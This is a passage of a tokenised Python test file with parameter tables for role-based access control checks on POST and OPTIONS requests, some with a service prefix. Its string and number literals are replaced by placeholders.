None , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) <EOL> ] <EOL> RBAC_POST = [ <EOL> ( '<STR_LIT:POST>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) <EOL> ] <EOL> RBAC_POST_WITH_SERVICE_PREFIX = [ <EOL> ( '<STR_LIT:POST>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , None , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , None , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , None , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , None , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , None , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) <EOL> ] <EOL> RBAC_OPTIONS = [ <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , <EOL> { "<STR_LIT>" : "<STR_LIT:*>" } , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , <EOL> { "<STR_LIT>" : "<STR_LIT>" } , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , <EOL> { "<STR_LIT>" : "<STR_LIT:*>" } , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , <EOL> { "<STR_LIT>" : "<STR_LIT>" } , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , <EOL> { "<STR_LIT>" : "<STR_LIT:*>" } , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , <EOL> { "<STR_LIT>" : "<STR_LIT>" } , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , <EOL> { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT:GET>" } , <EOL> None , None , None , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , <EOL> { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT:GET>" } , <EOL> None , None , None , <EOL> { "<STR_LIT>" : "<STR_LIT:*>" } , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , <EOL> { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT:GET>" } , <EOL> None , None , None , <EOL> { "<STR_LIT>" : "<STR_LIT>" } , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , <EOL> { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT:GET>" } , <EOL> None , '<STR_LIT>' , None , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , <EOL> { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT:GET>" } , <EOL> None , '<STR_LIT>' , None , <EOL> { "<STR_LIT>" : "<STR_LIT:*>" } , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , <EOL> { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT:GET>" } , <EOL> None , '<STR_LIT>' , None , <EOL> { "<STR_LIT>" : "<STR_LIT>" } , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , <EOL> { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT:GET>" } , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , <EOL> { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT:GET>" } , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , <EOL> { "<STR_LIT>" : "<STR_LIT:*>" } , <EOL> None , '<STR_LIT>' , None , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , <EOL> { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT:GET>" } , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , <EOL> { "<STR_LIT>" : "<STR_LIT>" } , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) <EOL> ] <EOL> RBAC_OPTIONS_WITH_SERVICE_PREFIX = [ <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , 